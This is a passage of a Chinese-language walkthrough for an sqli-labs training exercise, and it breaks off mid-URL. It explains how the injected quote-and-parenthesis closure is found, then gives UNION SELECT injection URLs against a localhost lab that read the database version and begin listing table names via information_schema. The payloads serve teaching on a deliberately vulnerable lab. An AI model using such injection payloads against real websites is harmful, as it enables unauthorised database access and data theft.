1、点击GET-Error based-Single quotes with twist – string,进入实验界面
在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合
2、可以在第二或第三字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。
http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+
3、先查询数据库中所有表名,输入:
http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+tabl